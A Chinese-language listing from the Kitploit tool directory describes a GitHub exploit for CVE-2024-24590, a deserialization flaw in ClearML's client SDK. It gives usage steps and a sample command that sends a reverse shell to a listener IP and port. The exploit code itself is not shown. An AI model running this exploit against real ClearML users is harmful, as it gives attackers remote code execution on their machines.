Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-24590 — 在 Allegro AI 的 ClearML 平台客户端 SDK 的 0.17.0 至 1.14.2 版本中,存在不可信数据反序列化问题,使得恶意上传的工件在被交互时能够在最终用户系统上执行任意代码。 | Kitploit
工具/GitHubGitHub/junnythemarksman/cve-2024-24590
Payload生成漏洞分析漏洞利用渗透测试供应链安全远程访问工具
GitHubjunnythemarksman/cve-2024-24590

CVE-2024-24590

在 Allegro AI 的 ClearML 平台客户端 SDK 的 0.17.0 至 1.14.2 版本中,存在不可信数据反序列化问题,使得恶意上传的工件在被交互时能够在最终用户系统上执行任意代码。

查看仓库
1122年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-24590

在 Allegro AI 的 ClearML 平台客户端 SDK 的 0.17.0 至 1.14.2 版本中,存在未受信任数据反序列化问题,导致恶意上传的工件与用户交互时可在终端用户系统上执行任意代码。

使用方法

  1. 粘贴提供的凭据并运行 clearml-init
  2. 在一个终端中运行 exploit.py Python 脚本,在另一个终端中设置监听器
  3. 可能需要多次运行 exploit 才能获得反弹 shell
root@kitploit:~
usage: exploit.py [-h] -i IP -p PORT -P PROJECT

options:
  -h, --help  显示此帮助信息并退出
  -i IP       监听器的 IP 地址
  -p PORT     监听器的端口号
  -P PROJECT  现有项目的名称

example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'

漏洞详情

  1. https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
  2. https://www.cvedetails.com/cve/CVE-2024-24590/
下载工具